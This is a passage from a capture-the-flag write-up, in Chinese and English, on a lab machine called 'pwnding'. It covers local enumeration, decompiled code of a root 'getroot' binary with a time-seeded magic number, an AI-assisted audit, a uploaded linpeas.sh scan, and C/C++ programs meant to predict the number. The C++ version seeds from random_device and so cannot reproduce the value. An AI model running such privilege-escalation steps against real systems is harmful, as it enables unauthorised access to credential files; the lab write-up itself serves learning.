\/dev\/null\n-rw-r--r-- 1 lamb lamb  220 Feb 19 09:23 .bash_logout\n-rw-r--r-- 1 lamb lamb 3526 Feb 19 09:23 .bashrc\n-rw-r--r-- 1 lamb lamb  807 Feb 19 09:23 .profile\n-rw------- 1 lamb lamb    0 Feb 20 03:18 .viminfo\n-rw-r--r-- 1 root root  528 Feb 24 07:52 this_is_a_tips.txt\n-rw-r--r-- 1 lamb lamb   39 Feb 24 07:52 use3e3e3e3e3sr.txt\n(remote) lamb@pwnding:\/home\/lamb$ cat this_is_a_tips.txt\nThere is a fun tool called cupp.\nI heard it&#039;s a good social engineering dictionary generator.\nAre there really people that stupid these days? haha.\nThere is only one way to become ROOT, which is to execute getroot!!!\nAnd don&#039;t forget, this is a PWN type machine.\n\n\u6709\u4e00\u4e2a\u5f88\u597d\u73a9\u7684\u5de5\u5177\u53eb\u505a cupp.\n\u542c\u8bf4\u90a3\u662f\u4e00\u4e2a\u4e0d\u9519\u7684\u793e\u4f1a\u5de5\u7a0b\u5b66\u5b57\u5178\u751f\u6210\u5668.\n\u73b0\u5728\u771f\u7684\u8fd8\u4f1a\u6709\u4eba\u8fd9\u4e48\u8822\u5417\uff1fhaha.\n\u6210\u4e3a ROOT \u7684\u65b9\u6cd5\u53ea\u6709\u4e00\u6761\uff0c\u5c31\u662f\u6267\u884c getroot !!!\n\u800c\u4e14\u4f60\u4e0d\u8981\u5fd8\u8bb0\u4e86\uff0c\u8fd9\u662f\u4e00\u4e2apwn\u7c7b\u578b\u7684\u673a\u5668.\n(remote) lamb@pwnding:\/home\/lamb$ cat use3e3e3e3e3sr.txt\nflag{3a463d08f2ae11efbeb6000c29094b2d}<\/code><\/pre>\n<p>So the <code>cupp<\/code> tool is needed; first, some information gathering:<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/home\/lamb$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\n(remote) lamb@pwnding:\/home\/lamb$ find \/ -group lamb  2&gt;\/dev\/null | grep -v proc\n\/var\/lib\/sudo\/lectured\/lamb\n\/home\/lamb\n\/home\/lamb\/.viminfo\n\/home\/lamb\/.profile\n\/home\/lamb\/.bashrc\n\/home\/lamb\/use3e3e3e3e3sr.txt\n\/home\/lamb\/.bash_logout\n\/home\/lamb\/.bash_history<\/code><\/pre>\n<p>Then I found this program and tried downloading it locally for testing:<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/home\/lamb$ 
whereis getroot\ngetroot: \/usr\/local\/bin\/getroot\n(remote) lamb@pwnding:\/home\/lamb$ getroot\nUsage: getroot &lt;magic_number&gt;\n(remote) lamb@pwnding:\/home\/lamb$ ls -la \/usr\/local\/bin\/getroot\n-rwxr-xr-x 1 root root 18912 Feb 20 02:19 \/usr\/local\/bin\/getroot\n(remote) lamb@pwnding:\/home\/lamb$ file \/usr\/local\/bin\/getroot\n\/usr\/local\/bin\/getroot: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=5b496760c7d2337cf4d56eef4b9a0c2e1c6e8e36, not stripped<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u4fdd\u62a4\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ pwn checksec getroot \n[*] &#039;\/home\/kali\/temp\/easypwn\/getroot&#039;\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    Stripped:   No<\/code><\/pre>\n<p><code>IDA<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  double v3; \/\/ xmm0_8\n  __int64 v4; \/\/ rax\n  __int64 v5; \/\/ rax\n  __int64 v6; \/\/ rdx\n  __int64 v7; \/\/ rax\n  int v8; \/\/ ebx\n  unsigned int v9; \/\/ eax\n  __int64 v10; \/\/ rax\n  __int64 v11; \/\/ rax\n  char v13; \/\/ [rsp+10h] [rbp-260h]\n  __int64 v14; \/\/ [rsp+110h] [rbp-160h]\n  char v15; \/\/ [rsp+220h] [rbp-50h]\n  int v16; \/\/ [rsp+240h] [rbp-30h]\n  int v17; \/\/ [rsp+244h] [rbp-2Ch]\n  int v18; \/\/ [rsp+248h] [rbp-28h]\n  char v19; \/\/ [rsp+24Fh] [rbp-21h]\n  double v20; \/\/ [rsp+250h] [rbp-20h]\n  int v21; \/\/ [rsp+258h] [rbp-18h]\n  int v22; \/\/ [rsp+25Ch] [rbp-14h]\n\n  if ( argc &gt; 1 )\n  {\n    v22 = atoi(argv[1]);\n    v9 = time(0LL);\n    srand(v9);\n    v21 = rand() % 86400;\n    generate_normal_distribution();\n    v20 = v3;\n    v16 = (signed 
int)(5.0 * v3) + v21;\n    v17 = 86399;\n    v10 = std::min&lt;int&gt;(&amp;v16, &amp;v17);\n    v18 = 0;\n    v16 = *(_DWORD *)std::max&lt;int&gt;(&amp;v18, v10);\n    std::allocator&lt;char&gt;::allocator(&amp;v19);\n    std::__cxx11::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt;&gt;::basic_string(&amp;v15, &quot;\/root\/cred&quot;, &amp;v19);\n    std::allocator&lt;char&gt;::~allocator(&amp;v19);\n    if ( v22 == v16 + 12345 )\n    {\n      std::basic_ifstream&lt;char,std::char_traits&lt;char&gt;&gt;::basic_ifstream(&amp;v13, &amp;v15, 8LL);\n      if ( (unsigned __int8)std::basic_ios&lt;char,std::char_traits&lt;char&gt;&gt;::operator bool(&amp;v14) )\n      {\n        v11 = std::basic_ifstream&lt;char,std::char_traits&lt;char&gt;&gt;::rdbuf(&amp;v13);\n        std::ostream::operator&lt;&lt;(&amp;std::cout, v11);\n      }\n      std::basic_ifstream&lt;char,std::char_traits&lt;char&gt;&gt;::~basic_ifstream(&amp;v13);\n    }\n    v8 = 0;\n    std::__cxx11::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt;&gt;::~basic_string(&amp;v15);\n  }\n  else\n  {\n    v4 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;(&amp;std::cerr, &quot;Usage: &quot;, envp);\n    v5 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;(v4, *argv, v4);\n    v7 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;(v5, &quot; &lt;magic_number&gt;&quot;, v6);\n    std::ostream::operator&lt;&lt;(v7, &amp;std::endl&lt;char,std::char_traits&lt;char&gt;&gt;);\n    v8 = 1;\n  }\n  return v8;\n}<\/code><\/pre>\n<pre><code class=\"language-c\">\/\/ generate_normal_distribution\ndouble generate_normal_distribution(void)\n{\n  double x; \/\/ ST18_8\n  double v1; \/\/ ST10_8\n  double v2; \/\/ xmm0_8\n  double v3; \/\/ ST08_8\n\n  x = (double)rand() \/ 2147483647.0;\n  v1 = (double)rand() \/ 2147483647.0;\n  v2 = log(x);\n  v3 = sqrt(-2.0 * v2);\n  return cos(6.283185307179586 * v1) * 
v3;\n}<\/code><\/pre>\n<h3>AI\u5ba1\u8ba1\u4ee3\u7801<\/h3>\n<p>\u4e22\u7ed9ai\u770b\u5427\uff1a<\/p>\n<blockquote>\n<p>\u6839\u636e\u63d0\u4f9b\u7684\u4ee3\u7801\uff0c\u6211\u5c06\u4ece\u51fd\u6570\u7b7e\u540d\u3001\u903b\u8f91\u6d41\u7a0b\u3001\u5b89\u5168\u673a\u5236\u548c\u5173\u952e\u51fd\u6570\u56db\u4e2a\u65b9\u9762\u8fdb\u884c\u5168\u9762\u5206\u6790\uff1a<\/p>\n<h3>1. **\u51fd\u6570\u7b7e\u540d\u4e0e\u53c2\u6570\u89e3\u6790<\/h3>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)<\/code><\/pre>\n<ul>\n<li><code>__cdecl<\/code>\u8c03\u7528\u7ea6\u5b9a\uff1a\n<ul>\n<li>C\/C++\u9ed8\u8ba4\u8c03\u7528\u7ea6\u5b9a\uff0c\u53c2\u6570\u4ece\u53f3\u5411\u5de6\u538b\u6808\uff0c\u8c03\u7528\u65b9\u6e05\u7406\u5806\u6808<\/li>\n<li>\u652f\u6301\u53ef\u53d8\u53c2\u6570\u51fd\u6570\uff08\u5982printf\uff09\uff0c\u65e0\u53c2\u6570\u6570\u91cf\u9650\u5236<\/li>\n<\/ul>\n<\/li>\n<li>\u53c2\u6570\u7ed3\u6784\uff1a\n<ul>\n<li><code>argc<\/code>\uff1a\u547d\u4ee4\u884c\u53c2\u6570\u6570\u91cf\uff08\u542b\u7a0b\u5e8f\u540d\uff09<\/li>\n<li><code>argv<\/code>\uff1a\u53c2\u6570\u503c\u6570\u7ec4\uff08<code>argv[0]<\/code>=\u7a0b\u5e8f\u8def\u5f84\uff09<\/li>\n<li><code>envp<\/code>\uff1a\u73af\u5883\u53d8\u91cf\u6570\u7ec4\uff08\u672a\u4f7f\u7528\uff09<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>2. <strong>\u6838\u5fc3\u903b\u8f91\u6d41\u7a0b<\/strong><\/h3>\n<h4>A. \u53c2\u6570\u6821\u9a8c\u5206\u652f<\/h4>\n<pre><code class=\"language-c\">if (argc > 1) {\n    \/\/ \u4e3b\u903b\u8f91\n} else {\n    \/\/ \u6253\u5370\u4f7f\u7528\u8bf4\u660e\n    std::cerr << \"Usage: \" << argv[0] << \" <magic_number>\";\n    return 1;\n}<\/code><\/pre>\n<ul>\n<li><strong>\u65e0\u53c2\u6570\u65f6<\/strong>\uff1a\u8f93\u51fa\u5e2e\u52a9\u4fe1\u606f\u5e76\u8fd4\u56de\u9519\u8bef\u7801<code>1<\/code><\/li>\n<li><strong>\u6709\u53c2\u6570\u65f6<\/strong>\uff1a\u8fdb\u5165\u8ba4\u8bc1\u903b\u8f91<\/li>\n<\/ul>\n<h4>B. 
\u8ba4\u8bc1\u673a\u5236\u5b9e\u73b0<\/h4>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849652.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849652.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"a\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h4>C. \u6587\u4ef6\u64cd\u4f5c<\/h4>\n<pre><code class=\"language-c\">if (v22 == v16 + 12345) {\n    std::ifstream file(\"\/root\/cred\");\n    if (file) std::cout << file.rdbuf();\n}<\/code><\/pre>\n<ul>\n<li><strong>\u6743\u9650\u8981\u6c42<\/strong>\uff1a\u9700root\u6743\u9650\u8bbf\u95ee<code>\/root\/cred<\/code><\/li>\n<li><strong>\u5b89\u5168\u98ce\u9669<\/strong>\uff1a\u786c\u7f16\u7801\u8def\u5f84\u53ef\u80fd\u5f15\u53d1\u8def\u5f84\u904d\u5386\u6f0f\u6d1e<\/li>\n<\/ul>\n<h3>3. 
<strong>\u5b89\u5168\u673a\u5236\u5206\u6790<\/strong><\/h3>\n<h4>a) \u968f\u673a\u6570\u751f\u6210<\/h4>\n<pre><code class=\"language-c\">v9 = time(0LL);\nsrand(v9);  \/\/ \u57fa\u4e8e\u65f6\u95f4\u7684\u79cd\u5b50\nv21 = rand() % 86400;  \/\/ 0-86399\u7684\u968f\u673a\u503c<\/code><\/pre>\n<ul>\n<li><strong>\u6f0f\u6d1e<\/strong>\uff1a<code>time(0)<\/code>\u7cbe\u5ea6\u4e3a\u79d2\u7ea7\uff0c\u653b\u51fb\u8005\u53ef\u7206\u7834\u65f6\u95f4\u7a97\u53e3<\/li>\n<li><strong>\u6539\u8fdb\u5efa\u8bae<\/strong>\uff1a\u6539\u7528<code>\/dev\/urandom<\/code>\u6216<code>rdrand<\/code>\u6307\u4ee4<\/li>\n<\/ul>\n<h4>b) \u6b63\u6001\u5206\u5e03\u53d8\u6362<\/h4>\n<pre><code class=\"language-c\">double generate_normal_distribution() {\n    double u1 = rand() \/ 2147483647.0;  \/\/ [0,1]\u5747\u5300\u5206\u5e03\n    double u2 = rand() \/ 2147483647.0;\n    return cos(2*M_PI*u2) * sqrt(-2*log(u1)); \/\/ Box-Muller\u53d8\u6362\n}<\/code><\/pre>\n<ul>\n<li><strong>\u7b97\u6cd5<\/strong>\uff1aBox-Muller\u5c06\u5747\u5300\u5206\u5e03\u8f6c\u4e3a\u6807\u51c6\u6b63\u6001\u5206\u5e03<\/li>\n<li><strong>\u4f5c\u7528<\/strong>\uff1a\u589e\u52a0<code>v16<\/code>\u7684\u968f\u673a\u6027\uff08\u504f\u79fb\u00b115\u79d2\uff09<\/li>\n<\/ul>\n<h4>c) \u9b54\u6cd5\u6570\u5b57\u6821\u9a8c<\/h4>\n<pre><code class=\"language-c\">v16 = clamp(5*v3 + v21, 0, 86399);\nif (v22 == v16 + 12345)  \/\/ \u9759\u6001\u504f\u79fb<\/code><\/pre>\n<ul>\n<li><strong>\u7206\u7834\u96be\u5ea6<\/strong>\uff1a\u7ea6<code>86400 * 30 \u2248 2.6e6<\/code>\u79cd\u53ef\u80fd\uff08\u53ef\u63a5\u53d7\uff09<\/li>\n<li><strong>\u7f3a\u9677<\/strong>\uff1a\u672a\u9632\u91cd\u653e\u653b\u51fb\uff0c\u6709\u6548\u671f\u4e3a1\u79d2<\/li>\n<\/ul>\n<h3>4. 
<strong>\u5173\u952e\u98ce\u9669\u4e0e\u6539\u8fdb<\/strong><\/h3>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\">\u98ce\u9669\u70b9<\/th>\n<th style=\"text-align: center;\">\u5371\u5bb3<\/th>\n<th style=\"text-align: center;\">\u89e3\u51b3\u65b9\u6848<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><code>\/root\/cred<\/code>\u786c\u7f16\u7801<\/td>\n<td style=\"text-align: center;\">\u8def\u5f84\u52ab\u6301<\/td>\n<td style=\"text-align: center;\">\u914d\u7f6e\u6587\u4ef6\u52a8\u6001\u52a0\u8f7d<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\u65f6\u95f4\u79cd\u5b50\u53ef\u9884\u6d4b<\/td>\n<td style=\"text-align: center;\">\u9b54\u6cd5\u6570\u5b57\u7206\u7834<\/td>\n<td style=\"text-align: center;\">\u6df7\u5408\u8fdb\u7a0bID+\u786c\u4ef6\u71b5\u6e90<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\u65e0\u8f93\u5165\u8fc7\u6ee4<\/td>\n<td style=\"text-align: center;\">\u7f13\u51b2\u533a\u6ea2\u51fa<\/td>\n<td style=\"text-align: center;\">\u6dfb\u52a0<code>strtol<\/code>\u9519\u8bef\u68c0\u67e5<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\">\u6587\u4ef6\u672a\u9a8c\u8bc1<\/td>\n<td style=\"text-align: center;\">\u7b26\u53f7\u94fe\u63a5\u653b\u51fb<\/td>\n<td style=\"text-align: 
center;\">\u6dfb\u52a0<code>lstat<\/code>\u6821\u9a8c<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u603b\u7ed3<\/h3>\n<p>\u8be5\u7a0b\u5e8f\u5b9e\u73b0\u4e86\u4e00\u4e2a\u57fa\u4e8e\u52a8\u6001\u9b54\u6cd5\u6570\u5b57\u7684\u8ba4\u8bc1\u673a\u5236\uff0c\u6838\u5fc3\u662f\u901a\u8fc7\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570\u589e\u52a0\u7206\u7834\u96be\u5ea6\u3002\u4e3b\u8981\u6539\u8fdb\u65b9\u5411\uff1a<\/p>\n<ol>\n<li><strong>\u589e\u5f3a\u71b5\u6e90<\/strong>\uff1a\u4f7f\u7528<code>getrandom()<\/code>\u66ff\u4ee3<code>time()+rand()<\/code><\/li>\n<li><strong>\u8def\u5f84\u5b89\u5168<\/strong>\uff1a\u907f\u514d\u786c\u7f16\u7801\u7279\u6743\u8def\u5f84<\/li>\n<li><strong>\u9519\u8bef\u5904\u7406<\/strong>\uff1a\u6dfb\u52a0<code>atoi<\/code>\u7684\u5f02\u5e38\u68c0\u6d4b<\/li>\n<li><strong>\u65e5\u5fd7\u76d1\u63a7<\/strong>\uff1a\u8bb0\u5f55\u5931\u8d25\u5c1d\u8bd5\u9632\u7206\u7834<\/li>\n<\/ol>\n<blockquote>\n<p>\u5b8c\u6574\u6267\u884c\u6d41\u7a0b\uff1a\u7528\u6237\u8f93\u5165\u2192\u65f6\u95f4\u71b5\u521d\u59cb\u5316\u2192\u6b63\u6001\u5206\u5e03\u504f\u79fb\u8ba1\u7b97\u2192\u9b54\u6cd5\u6570\u5b57\u6821\u9a8c\u2192\u7279\u6743\u6587\u4ef6\u8bbf\u95ee\u3002\u5176\u8bbe\u8ba1\u9002\u5408\u77ed\u671f\u6709\u6548\u7684\u8ba4\u8bc1\u573a\u666f\uff0c\u4f46\u9700\u52a0\u56fa\u968f\u673a\u6570\u751f\u6210\u73af\u8282-<\/p>\n<\/blockquote>\n<h3>\ud83d\udd11 <strong>\u5bc6\u94a5\u751f\u6210\u6d41\u7a0b<\/strong><\/h3>\n<ol>\n<li>\n<p><strong>\u521d\u59cb\u5316\u968f\u673a\u79cd\u5b50<\/strong><\/p>\n<pre><code class=\"language-c\">v9 = time(0LL);  \/\/ \u83b7\u53d6\u5f53\u524d\u65f6\u95f4\u6233\nsrand(v9);       \/\/ \u7528\u65f6\u95f4\u6233\u521d\u59cb\u5316\u968f\u673a\u79cd\u5b50<\/code><\/pre>\n<p><em>\uff08\u57fa\u4e8e\u7cfb\u7edf\u65f6\u95f4\uff0c\u5b58\u5728\u53ef\u9884\u6d4b\u6027\u98ce\u9669\uff09<\/em><\/p>\n<\/li>\n<li>\n<p><strong>\u751f\u6210\u57fa\u7840\u968f\u673a\u6570 <code>v21<\/code><\/strong><\/p>\n<pre><code class=\"language-c\">v21 = rand() % 
86400;  \/\/ \u751f\u6210 [0, 86399] \u7684\u968f\u673a\u6574\u6570<\/code><\/pre>\n<p><em>\uff08\u8986\u76d6\u4e00\u5929\u7684\u603b\u79d2\u6570\uff09<\/em><\/p>\n<\/li>\n<li>\n<p><strong>\u751f\u6210\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570 <code>z0<\/code><\/strong><\/p>\n<pre><code class=\"language-c\">generate_normal_distribution();  \/\/ \u8c03\u7528\u6b63\u6001\u5206\u5e03\u751f\u6210\u51fd\u6570\nv20 = v3;  \/\/ v3 \u4e3a\u51fd\u6570\u8fd4\u56de\u503c z0<\/code><\/pre>\n<p><strong>\u51fd\u6570\u5185\u90e8\u64cd\u4f5c<\/strong>\uff1a<\/p>\n<ul>\n<li>\n<p><code>u1 = rand() \/ 2147483647.0<\/code> \u2192 \u5747\u5300\u5206\u5e03\u968f\u673a\u6570 [0,1]<\/p>\n<\/li>\n<li>\n<p><code>u2 = rand() \/ 2147483647.0<\/code> \u2192 \u5747\u5300\u5206\u5e03\u968f\u673a\u6570 [0,1]<\/p>\n<\/li>\n<li>\n<pre><code>z0 = cos(2\u03c0 * u2) * sqrt(-2 * ln(u1))<\/code><\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>\u8ba1\u7b97\u4e34\u65f6\u53d8\u91cf <code>temp<\/code><\/strong><\/p>\n<pre><code class=\"language-c\">temp = (int)(5.0 * z0) + v21;  \/\/ \u53e0\u52a0\u6b63\u6001\u504f\u79fb\u4e0e\u57fa\u7840\u968f\u673a\u6570<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u94b3\u5236 <code>temp<\/code> \u5230\u5408\u6cd5\u8303\u56f4<\/strong><\/p>\n<pre><code class=\"language-c\">v16 = std::min(std::max(0, temp), 86399);  \/\/ \u9650\u5236\u5728 [0, 86399]<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u751f\u6210\u6700\u7ec8\u5bc6\u94a5 <code>key<\/code><\/strong><\/p>\n<pre><code class=\"language-c\">key = v16 + 12345;  \/\/ \u53e0\u52a0\u56fa\u5b9a\u504f\u79fb\u91cf<\/code><\/pre>\n<\/li>\n<\/ol>\n<\/blockquote>\n<p>\u4f7f\u7528 AI \u7ed9\u51fa\u4e86\u4e0b\u9762\u8fd9\u4e2apayload\u4ee5\u5339\u914d\u524d\u9762\u7684\u903b\u8f91\uff1a<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;time.h&gt;\n#include &lt;math.h&gt;\n\n\/\/ 
\u751f\u6210\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570\uff08Box-Muller\u53d8\u6362\uff09[2,9](@ref)\ndouble generate_normal_distribution() {\n    double u1 = (double)rand() \/ RAND_MAX;  \/\/ [0,1]\u5747\u5300\u5206\u5e03\n    double u2 = (double)rand() \/ RAND_MAX;  \/\/ [0,1]\u5747\u5300\u5206\u5e03\n    return cos(2 * M_PI * u2) * sqrt(-2 * log(u1));\n}\n\nint main() {\n    \/\/ 1. \u521d\u59cb\u5316\u968f\u673a\u79cd\u5b50\uff08\u57fa\u4e8e\u5f53\u524d\u65f6\u95f4\uff09[2,9](@ref)\n    srand(time(NULL));\n\n    \/\/ 2. \u751f\u6210\u57fa\u7840\u968f\u673a\u6570 v21 \u2208 [0, 86399]\n    int v21 = rand() % 86400;\n\n    \/\/ 3. \u751f\u6210\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570 z0 [2](@ref)\n    double z0 = generate_normal_distribution();\n\n    \/\/ 4. \u8ba1\u7b97\u4e34\u65f6\u503c temp = (int)(5.0 * z0) + v21\n    int temp = (int)(5.0 * z0) + v21;\n\n    \/\/ 5. \u94b3\u5236\u7ed3\u679c\u5230 [0, 86399] \u8303\u56f4\n    temp = (temp &lt; 0) ? 0 : (temp &gt; 86399) ? 86399 : temp;\n\n    \/\/ 6. 
\u751f\u6210\u6700\u7ec8\u9b54\u6cd5\u6570\u5b57 key = temp + 12345\n    int key = temp + 12345;\n\n    printf(&quot;%d\\n&quot;, key);\n    return 0;\n}<\/code><\/pre>\n<p>\u8fdb\u884c\u7f16\u8bd1\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ gcc exp.c -o exp -lm  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ file exp                                                                                                                                                                \nexp: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=732f39222f1e9627e31e63a54df1026b99b50946, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n<p>\u4f46\u662f\u53d1\u73b0\u672c\u5730\u751f\u6210\u7684\u4f20\u4e0a\u53bb\u7528\u4e0d\u4e86\uff0c\u6240\u4ee5\u4f20\u4e0a\u53bb\u8fdb\u884c\u7f16\u8bd1\uff0c\u4f46\u662f\u62a5\u9519\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/tmp$ gcc exp.c -o exp -lm\ncollect2: fatal error: cannot find &#039;ld&#039;\ncompilation terminated.<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6362\u4e3a<code>c++<\/code>\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-cpp\">#include &lt;iostream&gt;\n#include &lt;random&gt;\n#include &lt;algorithm&gt;\n\nint main() {\n    \/\/ 1. \u521d\u59cb\u5316\u968f\u673a\u6570\u5f15\u64ce\uff08\u57fa\u4e8e\u65f6\u95f4\uff09\n    std::random_device rd;\n    std::mt19937 gen(rd());\n\n    \/\/ 2. \u751f\u6210\u57fa\u7840\u968f\u673a\u6570 v21 \u2208 [0, 86399]\n    std::uniform_int_distribution&lt;int&gt; base_dist(0, 86399);\n    int v21 = base_dist(gen);\n\n    \/\/ 3. 
\u751f\u6210\u6807\u51c6\u6b63\u6001\u5206\u5e03\u968f\u673a\u6570 (\u03bc=0, \u03c3=1)\n    std::normal_distribution&lt;double&gt; normal_dist(0.0, 1.0);\n    double z0 = normal_dist(gen);\n\n    \/\/ 4. \u8ba1\u7b97\u4e34\u65f6\u503c\n    int temp = static_cast&lt;int&gt;(5.0 * z0) + v21;\n\n    \/\/ 5. \u94b3\u5236\u5230\u5408\u6cd5\u8303\u56f4\n    temp = std::max(0, std::min(temp, 86399));\n\n    \/\/ 6. \u751f\u6210\u6700\u7ec8\u9b54\u6cd5\u6570\u5b57\n    int magic_number = temp + 12345;\n\n    std::cout &lt;&lt; magic_number &lt;&lt; std::endl;\n    return 0;\n}<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\uff0c\u4f46\u662f\u53d1\u73b0\u9700\u8981\u8bf7\u6c42<code>\/root\/cred<\/code>\uff0c\u6ca1\u6709\u6743\u9650\uff0c\u524d\u9762\u63d0\u793a\u5230\u4e86\u9700\u8981\u793e\u5de5\u83b7\u53d6\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u4e0a\u4f20<code>linpeas.sh<\/code>\uff1a<\/p>\n<p>\u53d1\u73b0\u5e38\u5361\u5728<code>cloud<\/code>\uff0c\u5c1d\u8bd5\u8df3\u8fc7\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\">.\/linpeas.sh -o system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e9b\u6709\u610f\u601d\u7684\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849653.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849653.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610175108684\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849654.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849654.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610174722752\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849655.png'><img class=\"lazyload lazyload-style-2\" 